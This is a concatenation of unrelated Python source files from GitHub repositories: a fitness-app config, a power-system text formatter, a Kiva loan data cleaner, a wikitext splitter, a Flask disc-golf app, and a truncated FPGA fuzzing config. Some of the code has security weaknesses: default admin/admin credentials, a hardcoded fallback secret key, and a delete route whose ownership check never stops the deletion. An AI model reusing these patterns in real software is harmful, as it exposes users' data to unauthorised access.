main(250_000)\r\n","repo_name":"siddsp02/Prime-Counter","sub_path":"primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31239419502","text":"#!/usr/bin/python\nimport os\nimport uuid\n\nDEBUG = True\nGOOGLE_OAUTH2_CLIENT_ID = os.environ.get('GOOGLE_OAUTH2_CLIENT_ID', 'not found')\nAUTH_URI = os.environ.get('AUTH_URI', 'not found')\nTOKEN_URI = os.environ.get('TOKEN_URI', 'not found')\nGOOGLE_OAUTH2_CLIENT_SECRET = os.environ.get('GOOGLE_OAUTH2_CLIENT_SECRET', 'not found')\nREDIRECT_URIS = os.environ.get('REDIRECT_URIS', 'not found')\nJAVASCRIPT_ORIGINS = os.environ.get('JAVASCRIPT_ORIGINS', 'not found')\nAPPLICATION_NAME = os.environ.get('APP_NAME', 'refit')\nUSERNAME = os.environ.get('USERNAME', 'admin')\nPASSWORD = os.environ.get('PASSWORD', 'admin')\nSECRET_KEY = os.environ.get('SECRET_KEY', str(uuid.uuid4()))\nHOST = os.environ.get('HOST', '0.0.0.0')\nPORT = int(os.environ.get('PORT', 5000))\nGOOGLE_FIT_SCOPES = ['https://www.googleapis.com/auth/fitness.body.read',\n 'https://www.googleapis.com/auth/fitness.activity.read', 'https://www.googleapis.com/auth/fitness.activity.read', 'https://www.googleapis.com/auth/drive.metadata.readonly']\nDATA_SOURCE_ID_CAL1 = 'derived:com.google.calories.bmr:com.google.android.gms:from_height&weight'\nDATA_SOURCE_ID_CAL2 = 'derived:com.google.calories.bmr:com.google.android.gms:merged'\nDATA_SOURCE_ID_STEPS = 'derived:com.google.step_count.delta:com.google.android.gms:estimated_steps'\nDATA_SOURCE_ID_WEIGHT_USER_INPUT = 'raw:com.google.height:com.google.android.apps.fitness:user_input'\nDATA_SOURCE_ID_HR = 'derived:com.google.heart_rate.bpm:com.google.android.gms:merge_heart_rate_bpm'\nDATA_SOURCE_ID_SLEEP = 'raw:com.google.activity.segment:com.mc.miband1:'\nDATA_SOURCE_ID_WEIGHT_MERGE = 'derived:com.google.weight:com.google.android.gms:merge_weight'\n","repo_name":"cnheider/refit","sub_path":"refit/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30955038084","text":"\"\"\"\nOutput TXT file formatter.\n\"\"\"\n\nimport os\nfrom typing import Iterable\n\nfrom andes.shared import np\n\n\ndef dump_data(text, header, rowname, data, file, width=18, precision=5):\n out = ''\n\n os.makedirs(os.path.abspath(os.path.dirname(file)), exist_ok=True)\n with open(file, 'w') as fid:\n\n for Text, Header, Rowname, Data in zip(text, header, rowname, data):\n # Write Text\n if Text:\n fid.writelines(Text)\n\n # determine the width for the first column (usually names)\n width_first = width\n if isinstance(Rowname, Iterable) and len(Rowname) > 0:\n for item in Rowname:\n if isinstance(item, Iterable) and len(item) > width_first:\n width_first = len(item)\n\n # Write Header\n if Header:\n ncol = len(Header)\n s = ' ' * width_first\n s += '{:>{width}s}' * ncol + '\\n'\n fid.writelines(s.format(*Header, width=width))\n fid.write('\\n')\n\n # Append Rowname to Data\n # Data is a list of column lists\n if Rowname is not None:\n ncol = 0\n for idx, item in enumerate(Rowname): # write by row as always\n if Data is None:\n out = ''\n elif isinstance(Data, (int, float, str)):\n out = [Data]\n elif isinstance(Data, (list, tuple, np.ndarray)):\n if isinstance(Data[0], (int, float)): # is a list of numbers\n out = [Data[idx]]\n elif isinstance(Data[0], (list, np.ndarray)): # list of list in Data\n ncol = len(Data)\n out = [Data[i][idx] for i in range(ncol)]\n else:\n print(Data)\n print('Unexpected Data during output, in formats/txt.py')\n\n s = '{:{width_first}s}' # for row header\n for ii, col in enumerate(out):\n if isinstance(col, (int, float)):\n s += '{:>{width}.{precision}g}'\n elif isinstance(col, str):\n if len(col) > width:\n out[ii] = col[:width]\n s += '{:>{width}s}'\n elif col is None:\n out[ii] = 'None'\n s += '{:>{width}s}'\n else:\n pass\n s += '\\n'\n\n fid.write(\n s.format(\n str(item), *out, width_first=width_first, width=width, precision=precision))\n fid.write('\\n')\n","repo_name":"CURENT/andes","sub_path":"andes/io/txt.py","file_name":"txt.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":178,"dataset":"github-code","pt":"18"} +{"seq_id":"2543922516","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 24 12:08:16 2018\r\n\r\n@author: Sandman\r\n\"\"\"\r\n\r\n# kiva_loans.csv file contains comma (,) in the column field value due to this Pyspark CSV reader package is unable to read data correctly\r\n\r\n# Thus, first load the data using the python pandas library and select the appropriate columns, handle the missing values and create new Spark data from Pandas dataframe\r\n\r\n# Operations are as below\r\n# Input File\r\n#kiva_loans.csv -- (id,funded_amount,loan_amount,activity,sector,use,country_code,country,region,currency,partner_id,posted_time,disbursed_time,funded_time,term_in_months,lender_count,tags,borrower_genders,repayment_interval,date)\r\n\r\n# output File in gunzip format\r\n# /user/sahilbhange/output/kiva/formated_output/part-00000.gz\r\n#(id,funded_amount,loan_amount,activity,sector,country,region,currency,partner_id,posted_time,disbursed_time,term_in_months,lender_count,borrower_genders,repayment_interval,date)\r\n\r\n# Spark parameter setting for execution\r\n\r\n# spark-submit --master yarn --conf spark.ui.port=12789 --num-executors 6 --executor-cores 3 --executor-memory 1G src/main/python/kiva_code/kiva_loans_data_preprocessing.py\r\n\r\n\r\nimport pandas as pd\r\nfrom pyspark import SparkConf, SparkContext\r\nfrom pyspark.sql import SQLContext\r\n#from pyspark.sql import *\r\n#from pyspark.sql.functions import *\r\n\r\nconf=SparkConf().setAppName(\"kiva-loan-file-cleaning\").setMaster(\"yarn-client\")\r\n\r\nsc = SparkContext(conf=conf)\r\n\r\nsqlContext = SQLContext(sc)\r\n\r\n# load csv file data using pandas\r\nkiva_loan_pdf=pd.read_csv(\"/home/sahilbhange/kiva_loan_data/kiva_loans.csv\", encoding='utf-8',delimiter=',')\r\n\r\n''' \r\n#pandas data pre-processing\r\n#Null values in borrower_genders column\r\n#>>> kiva_loan_pdf['borrower_genders'].isnull().sum()\r\n#4221\r\n\r\n#There are 4221 records with NULL value for field 'borrower_genders'\r\n#Thus default NULL value as \"NotAvailable\"\r\n'''\r\n\r\nkiva_loan_pdf['borrower_genders']=kiva_loan_pdf['borrower_genders'].fillna(\"NotAvailable\")\r\n'''\r\n# normalize the values in borrower_genders columns as below\r\n# male - male\r\n# female - female\r\n# if male and female - group \r\n'''\r\nkiva_loan_pdf['borrower_genders']=[elem if elem in ['female','male'] else 'group' for elem in kiva_loan_pdf['borrower_genders'] ]\r\n\r\n'''\r\n# There are 2396 records with NULL value for field 'disbursed_time'\r\n# thus default missing disbursed_time with '1900-01-01 00:00:00+00:00'\r\n# We can filter out default value records while querying the data\r\n#>>> kiva_loan_pdf['disbursed_time'].isnull().sum()\r\n#2396\r\n# Default the missing values for disbursed_time with '1900-01-01 00:00:00+00:00'\r\n'''\r\n\r\nkiva_loan_pdf['disbursed_time']=kiva_loan_pdf['disbursed_time'].fillna(\"1900-01-01 00:00:00+00:00\")\r\n\r\n'''\r\n#>>> kiva_loan_pdf['country_code'].isnull().sum()\r\n#8\r\n\r\n# 8 values for country_code field are NULL\r\n\r\n# Find the corresponding coutry for NULL country_code value\r\n#>>> kiva_loan_pdf[kiva_loan_pdf['country_code'].isnull()][['country','country_code']]\r\n# country country_code\r\n#202537 Namibia NaN\r\n\r\n# Country Namibia has null values for country field\r\n# Fill Namibia coutry code value as 'NA'\r\n'''\r\n\r\nkiva_loan_pdf['country_code']=kiva_loan_pdf['country_code'].fillna(\"NA\")\r\n\r\n# Select only required fields and create new pandas data frame\r\n# Exclude the country code in new file as coutry and coutry code give same information\r\nkivaLoan_req_fields = kiva_loan_pdf[['id','funded_amount','loan_amount','activity','sector','country','currency','partner_id','posted_time','disbursed_time','term_in_months','lender_count','borrower_genders','repayment_interval','date']]\r\n\r\nsqlc=SQLContext(sc)\r\n\r\n# Convert Pandas dataframe to Spark data frame\r\nkivaLoan_SDF=sqlc.createDataFrame(kivaLoan_req_fields)\r\n\r\n\r\n# Save the Spark data frame with the required fields to HDFS in gunzip format\r\n# Save in overwrite mode in case of rerun\r\nkivaLoan_SDF.repartition(1).write.format('com.databricks.spark.csv').option(\"codec\", \"org.apache.hadoop.io.compress.GzipCodec\").save('/user/sahilbhange/output/kiva/formated_output/',header = 'true',mode='overwrite')\r\n\r\n\r\n","repo_name":"sahilbhange/Kiva-Loan-Data-Warehouse","sub_path":"kiva_datapreprocessing/kiva_loans_data_preprocessing.py","file_name":"kiva_loans_data_preprocessing.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"3210122533","text":"import argparse\nimport os\nimport re\n\n\ndef parameters():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_filename\", type=str, help=\"file to be sampled\") # 切分的文件路径\n parser.add_argument(\"--output_dir\", type=str) # 切分后的文件保存路径\n args = parser.parse_args()\n\n return args\n\n\n# filename = './wikitext-103-raw/wiki.test.raw'\n# output_dir = './wikitext-103-raw/shuffle'\n\n# 将文件按一级标题划分\ndef read_line(args):\n filename = args.input_filename\n output_dir = args.output_dir\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n \n file = open(filename, \"r\", encoding=\"utf-8\") \n paragraph = []\n f_id, title_flag = 1, -1\n \n for line in file:\n tokens = line.strip().split(' ') \n if tokens[0] == \"=\" and tokens[-1] == \"=\" and tokens[1] != \"=\": # 判断是否是一级标题\n title_flag += 1\n \n if title_flag != 1:\n paragraph = open(output_dir+'/'+str(f_id)+'.raw', 'a') # 以写模式\"w\" open会造成覆盖,应该以追加模式\"a\"\n paragraph.writelines(line)\n paragraph.close()\n\n # 遇到新的一级标题,存储在新的文件\n elif title_flag == 1:\n # print(\"Paragraph file saved: \", f_id)\n f_id += 1\n title_flag = 0 \n paragraph = open(output_dir+'/'+str(f_id)+'.raw', 'a') \n paragraph.writelines(line)\n paragraph.close() \n print(\"--------------------\")\n print(\"Input: \", filename)\n print(\"Output: \", output_dir)\n print(\"Total processed: \", f_id, \"files.\")\n print(\"--------------------\")\n file.close()\n\nargs = parameters()\n\ndef main():\n read_line(args)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"YeLusin/FedBERT","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"35348975621","text":"import os\nfrom datetime import datetime\nfrom flask import Flask, request, render_template, redirect, flash, session, g, jsonify\nfrom models import db, connect_db, GroupRound, User, UserRound, Follows\nimport requests\nfrom sqlalchemy.exc import IntegrityError, InvalidRequestError\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom forms import LoginForm, RegisterForm, EditUser, NewRound\nfrom psycopg2.errors import UniqueViolation\nfrom secret.secret import API_KEY, NAME_SEARCH_SIG, ZIP_SEARCH_SIG, LOC_SEARCH_SIG, ID_SEARCH_SIG, PHOTO_SEARCH_SIG, HOLE_INFO_SIG\n\napp = Flask(__name__)\n\nACTIVE_USER = \"active_user_id\"\n\n\nAPI_URL = \"https://www.dgcoursereview.com/api_test/\"\n\n# app.config['API_KEY'] = os.environ.get('API_KEY')\n# app.config['NAME_SEARCH_SIG'] = os.environ.get(\n# 'NAME_SEARCH_SIG')\n# app.config['ZIP_SEARCH_SIG'] = os.environ.get('ZIP_SEARCH_SIG')\n# app.config['LOC_SEARCH_SIG '] = os.environ.get(\n# 'LOC_SEARCH_SIG')\n# app.config['ID_SEARCH_SIG'] = os.environ.get('ID_SEARCH_SIG')\n# app.config['PHOTO_SEARCH_SIG'] = os.environ.get(\n# 'PHOTO_SEARCH_SIG')\n# app.config['HOLE_INFO_SIG'] = os.environ.get('HOLE_INFO_SIG')\n\n\n#########################Local Stuff ##################################\n\napp.config['API_KEY'] = os.environ.get('API_KEY', API_KEY)\napp.config['NAME_SEARCH_SIG'] = os.environ.get(\n 'NAME_SEARCH_SIG', NAME_SEARCH_SIG)\napp.config['ZIP_SEARCH_SIG'] = os.environ.get('ZIP_SEARCH_SIG', ZIP_SEARCH_SIG)\napp.config['LOC_SEARCH_SIG '] = os.environ.get(\n 'LOC_SEARCH_SIG', LOC_SEARCH_SIG)\napp.config['ID_SEARCH_SIG'] = os.environ.get('ID_SEARCH_SIG', ID_SEARCH_SIG)\napp.config['PHOTO_SEARCH_SIG'] = os.environ.get(\n 'PHOTO_SEARCH_SIG', PHOTO_SEARCH_SIG)\napp.config['HOLE_INFO_SIG'] = os.environ.get('HOLE_INFO_SIG', HOLE_INFO_SIG)\n\n\n#####################################\n\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get(\n 'DATABASE_URL', 'postgresql:///discgolf')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ECHO'] = False\napp.config['SECRET_KEY'] = os.environ.get('SECRET_KEY', 'veryverysecret')\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\napp.debug = False\n\ndebug = DebugToolbarExtension(app)\n\n\nconnect_db(app)\n\n\n@app.before_request\ndef add_user_to_g():\n \"\"\"If we're logged in, add curr user to Flask global.\"\"\"\n\n if ACTIVE_USER in session:\n g.user = User.query.get(session[ACTIVE_USER])\n\n else:\n g.user = None\n\n\ndef user_login(user):\n \"\"\"Log in user\"\"\"\n session[ACTIVE_USER] = user.id\n\n\ndef user_logout():\n \"\"\"Log out user\"\"\"\n if ACTIVE_USER in session:\n del session[ACTIVE_USER]\n\n\ndef get_course_by_id(course_id):\n \"\"\"A call to the API to gather course information based on the course id\n returns a single JSON course response\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': 'crseinfo', 'id': course_id, 'sig': app.config['ID_SEARCH_SIG']})\n if not res:\n return []\n\n return res.json()\n\n\ndef get_course_by_name(name):\n \"\"\"search the API for courses by name. Returns list of JSON objects\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': 'findname', 'name': name, 'sig': app.config['NAME_SEARCH_SIG']})\n if not res:\n return []\n return res.json()\n\n\ndef get_hole_info(course_id):\n \"\"\"search hole information for selected course. Returns json list of holes and information\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': \"holeinfo\", 'id': course_id, 'sig': app.config['HOLE_INFO_SIG']\n })\n if not res:\n return []\n return res.json()\n\n\ndef get_course_photo(course_id):\n \"\"\"retreive a course photo from the API. Returns URL\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': \"crsephto\", 'id': course_id, 'sig': app.config['PHOTO_SEARCH_SIG']\n })\n if not res:\n return None\n return res.json()['course_photo_url_medium']\n\n\ndef search_by_zip(zip):\n \"\"\"Searches API for course close to zip. Returns list of JSON objects\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': \"findzip\", 'zip': zip, 'sig': app.config['ZIP_SEARCH_SIG']\n })\n if not res:\n return []\n return res.json()\n\n\n@app.route('/')\ndef base():\n if g.user:\n return redirect('/home')\n return render_template('home.html')\n\n\n@app.route('/login', methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"Handles User Login\"\"\"\n\n form = LoginForm()\n if g.user:\n flash(\"Already logged in, log out to log in as different user\", \"warning\")\n return redirect('/')\n if form.validate_on_submit():\n user = User.authenticate(form.username.data,\n form.password.data)\n\n if user:\n user_login(user)\n flash(f\"Welcome back, {user.username}!\", \"success\")\n return redirect(\"/\")\n\n flash(\"Invalid login information\", \"danger\")\n\n return render_template('login.html', form=form)\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n \"\"\"page with form to register a new user\"\"\"\n form = RegisterForm()\n if g.user:\n flash(\"Already logged in, log out to register new user\", \"warning\")\n return redirect('/')\n\n if form.validate_on_submit():\n try:\n new_user = User.signup(\n username=form.username.data,\n first_name=form.first_name.data,\n last_name=form.last_name.data,\n email=form.email.data,\n password=form.password.data\n )\n db.session.commit()\n\n except:\n flash(\"Username or Email is already being used\", \"danger\")\n return render_template(\"register.html\", form=form)\n\n user_login(new_user)\n return redirect('/home')\n else:\n return render_template(\"register.html\", form=form)\n\n\n@app.route('/logout', methods=['POST'])\ndef logout_user():\n if not g.user:\n flash(\"Log in before you can log out!\", \"warning\")\n return redirect('/')\n user_logout()\n flash(\"Log out was successful!\", 'success')\n return redirect('/')\n\n\n@app.route('/home')\ndef home_page():\n \"\"\"landing page when the site is visited\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n rounds = UserRound.query.order_by(UserRound.date.desc()).all()\n\n return render_template('userhome.html', rounds=rounds)\n\n#######################################\n# Course Routes #\n\n\n@app.route('/course_details/')\ndef show_course_details(id):\n \"\"\"Shows details of chosen course\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n rounds = UserRound.query.filter(\n UserRound.course_id == id).order_by(UserRound.date.desc()).all()\n try:\n course = get_course_by_id(id)\n holes = get_hole_info(id)\n except:\n flash(\"An error occured, try again\", \"danger\")\n return redirect('/')\n return render_template('/course/course_home.html', course=course, rounds=rounds, holes=holes)\n\n\n# @app.route('/course_details//holes')\n# def show_hole_info(id):\n# if not g.user:\n# flash(\"Please Log in or Register!\", \"danger\")\n# return redirect('/')\n# course = get_course_by_id(id)\n# holes = get_hole_info(id)\n\n# return render_template('course/tee_info.html', holes=holes, course=course)\n\n\n####################################\n# User Routes #\n@app.route('/users/')\ndef show_user_details(id):\n \"\"\"shows a users details to another logged in user. If page is logged in users details, can be edited.\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n following = [f.id for f in user.following]\n following_rounds = (UserRound.query.filter(UserRound.user_id.in_(following))\n .order_by(UserRound.date.desc())\n .all())\n return render_template('/user/user_details.html', user=user, following_rounds=following_rounds)\n\n\n@app.route('/users//rounds')\ndef show_user_rounds(id):\n \"\"\"Show user page with most recent rounds\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n return render_template('/user/user_rounds.html', user=user)\n\n\n@app.route('/users//following')\ndef show_user_follows(id):\n \"\"\"Show user page with all followed users\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n return render_template('/user/following.html', user=user)\n\n\n@app.route('/users//followers')\ndef show_user_followers(id):\n \"\"\"Show user page with all followers\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n return render_template('/user/followers.html', user=user)\n\n\n@app.route('/users//following_rounds')\ndef show_following_rounds(id):\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n following = [f.id for f in user.following]\n following_rounds = (UserRound.query.filter(UserRound.user_id.in_(following))\n .order_by(UserRound.date.desc())\n .all())\n return render_template('user/following_rounds.html', user=user, following_rounds=following_rounds)\n\n\n@app.route('/users//edit', methods=['GET', 'POST'])\ndef edit_user(id):\n \"\"\"Shows edit user page and submits changes to the DB\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n if g.user.id != id:\n flash(\"Unautherized to edit user\", 'danger')\n return redirect('/')\n user = g.user\n form = EditUser(obj=user)\n if form.validate_on_submit():\n if User.authenticate(user.username, form.password.data):\n try:\n user.username = form.username.data\n user.first_name = form.first_name.data\n user.last_name = form.last_name.data\n user.email = form.email.data\n user.location = form.location.data\n user.bio = form.bio.data\n user.avatar = form.avatar.data\n user.fav_course = form.fav_course.data\n if user.fav_course:\n course = get_course_by_name(user.fav_course)\n if course:\n user.fav_course = course[0][\"name\"]\n db.session.commit()\n\n except (IntegrityError, InvalidRequestError, UniqueViolation):\n db.session.rollback()\n flash(\"Username or Email is already being used\", \"danger\")\n return render_template('user/edit_user.html', user=user, form=form)\n flash(\"Profile edited successfully!\", 'success')\n return redirect(f\"/users/{user.id}\")\n flash(\"Incorrect Password\", 'danger')\n return render_template('user/edit_user.html', user=user, form=form)\n else:\n return render_template('user/edit_user.html', user=user, form=form)\n\n\n@app.route('/users//delete', methods=['POST'])\ndef delete_user(id):\n \"\"\"Remove user\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n if user.id != g.user.id:\n flash(\"Can not delete another user\", \"danger\")\n return redirect('/')\n db.session.delete(user)\n db.session.commit()\n flash('User successfully removed', \"success\")\n return redirect('/')\n\n\n@app.route('/course_details//new_round', methods=['GET', 'POST'])\ndef add_new_round(id):\n \"\"\"Adding a new round\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n form = NewRound()\n user = g.user\n\n course = get_course_by_id(id)\n if form.validate_on_submit():\n date = form.date.data\n score = form.score.data\n notes = form.notes.data\n user_id = user.id\n\n new_round = UserRound(user_id=user.id, course_id=course['course_id'],\n course_name=course['name'], date=date, score=score, notes=notes)\n db.session.add(new_round)\n try:\n db.session.commit()\n except:\n flash('Something went wrong, try again', 'danger')\n return render_template('course/new_round.html', form=form)\n flash('Round added successfully', 'success')\n return redirect(f'/course_details/{id}')\n else:\n return render_template('course/new_round.html', form=form, user=user, course=course)\n\n\n@app.route(\"/users//follow\", methods=['POST'])\ndef follow_user(id):\n \"\"\"Adding user to followed users\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n if g.user.id == id:\n flash(\"Following yourself is a little vain, don't you think?\", \"warning\")\n return redirect('/')\n\n followed_user = User.query.get_or_404(id)\n followed_user.followers.append(g.user)\n db.session.commit()\n\n return redirect(f\"/users/{id}\")\n\n\n@app.route(\"/users//unfollow\", methods=['POST'])\ndef unfollow_user(id):\n \"\"\"removes user form followed user\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n if g.user.id == id:\n flash(\"Can't unfollow yourself, unfortunately\", \"warning\")\n return redirect('/')\n\n followed_user = User.query.get_or_404(id)\n followed_user.followers.remove(g.user)\n db.session.commit()\n\n return redirect(f\"/users/{id}\")\n\n\n@app.route(\"/round_info/\")\ndef show_round_info(id):\n \"\"\"Shows details from a specified round\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n d_round = UserRound.query.get_or_404(id)\n return render_template('round_info.html', round=d_round)\n\n\n###################################\n# Search Routes #\n\n@app.route('/course_search_name')\ndef search_course_by_name_results():\n \"\"\"Shows results of a search for courses by name.\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n\n search = request.args['course-name-input']\n courses = get_course_by_name(search)\n return render_template('/search/course_search_results.html', courses=courses)\n\n\n@app.route('/fav_course_search_name/')\ndef search_fav_course_by_name_results(fav):\n \"\"\"Shows results of a search for courses by from fav link\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n\n courses = get_course_by_name(fav)\n return render_template('/search/course_search_results.html', courses=courses)\n\n\n@app.route('/course_search_zip')\ndef search_course_by_zip_results():\n \"\"\"Shows results of a search for courses by zipcode.\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n\n search = request.args['course-zip']\n courses = search_by_zip(search)\n return render_template('/search/course_search_results.html', courses=courses)\n\n\n@app.route('/user_search')\ndef user_search_results():\n \"\"\"Shows results of a search for users by username.\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n\n search = request.args['user-username-input']\n users = User.query.filter(User.username.like(f\"%{search}%\")).all()\n return render_template('/search/user_search_results.html', users=users)\n\n\n########################################################################\n# API calls from the front end #\n\n@app.route('/delete_round/', methods=['DELETE'])\ndef delete_round(id):\n \"\"\"Deletes and removes round\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n dround = UserRound.query.get_or_404(id)\n if dround.user_id != g.user.id:\n flash(\"Cannot delete other users rounds\", \"danger\")\n db.session.delete(dround)\n db.session.commit()\n return jsonify()\n","repo_name":"namroc89/DiscDown","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36568374229","text":"from fuzzconfig import FuzzConfig\nimport nonrouting\nimport fuzzloops\nimport re\n\nconfigs = [\n\n # LIFCL-40 tiles\n (\"IOL_B8A\", \"IOLOGICA\", FuzzConfig(job=\"IOL5AMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C8:SYSIO_B5_0\", \"CIB_R56C9:SYSIO_B5_1\"])),\n (\"IOL_B8B\", \"IOLOGICB\", FuzzConfig(job=\"IOL5BMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C8:SYSIO_B5_0\", \"CIB_R56C9:SYSIO_B5_1\"])),\n (\"IOL_B18A\", \"IOLOGICA\", FuzzConfig(job=\"IOL4AMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C18:SYSIO_B4_0\", \"CIB_R56C19:SYSIO_B4_1\"])),\n (\"IOL_B18B\", \"IOLOGICB\", FuzzConfig(job=\"IOL4BMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C18:SYSIO_B4_0\", \"CIB_R56C19:SYSIO_B4_1\"])),\n (\"IOL_B56A\", \"IOLOGICA\", FuzzConfig(job=\"IOL3AMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C56:SYSIO_B3_0\", \"CIB_R56C57:SYSIO_B3_1\"])),\n (\"IOL_B56B\", \"IOLOGICB\", FuzzConfig(job=\"IOL3BMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C56:SYSIO_B3_0\", \"CIB_R56C57:SYSIO_B3_1\"])),\n\n (\"IOL_R32A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL2AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R32C87:SYSIO_B2_0_EVEN\"])),\n (\"IOL_R32B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL2BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R32C87:SYSIO_B2_0_EVEN\"])),\n (\"IOL_L32A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL6AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R32C0:SYSIO_B6_0_EVEN\"])),\n (\"IOL_L32B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL6BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R32C0:SYSIO_B6_0_EVEN\"])),\n (\"IOL_R13A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL1AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R13C87:SYSIO_B1_0_EVEN\"])),\n (\"IOL_R13B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL1BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R13C87:SYSIO_B1_0_EVEN\"])),\n (\"IOL_L6A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL7AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R6C0:SYSIO_B7_0_EVEN\"])),\n (\"IOL_L6B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL7BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R6C0:SYSIO_B7_0_EVEN\"])),\n\n (\"IOL_R34A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL2AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R34C87:SYSIO_B2_0_ODD\"])),\n (\"IOL_R34B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL2BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R34C87:SYSIO_B2_0_ODD\"])),\n (\"IOL_L34A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL6AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R34C0:SYSIO_B6_0_ODD\"])),\n (\"IOL_L34B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL6BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R34C0:SYSIO_B6_0_ODD\"])),\n (\"IOL_R15A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL1AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R15C87:SYSIO_B1_0_ODD\"])),\n (\"IOL_R15B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL1BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R15C87:SYSIO_B1_0_ODD\"])),\n (\"IOL_L8A\", \"SIOLOGICA\", 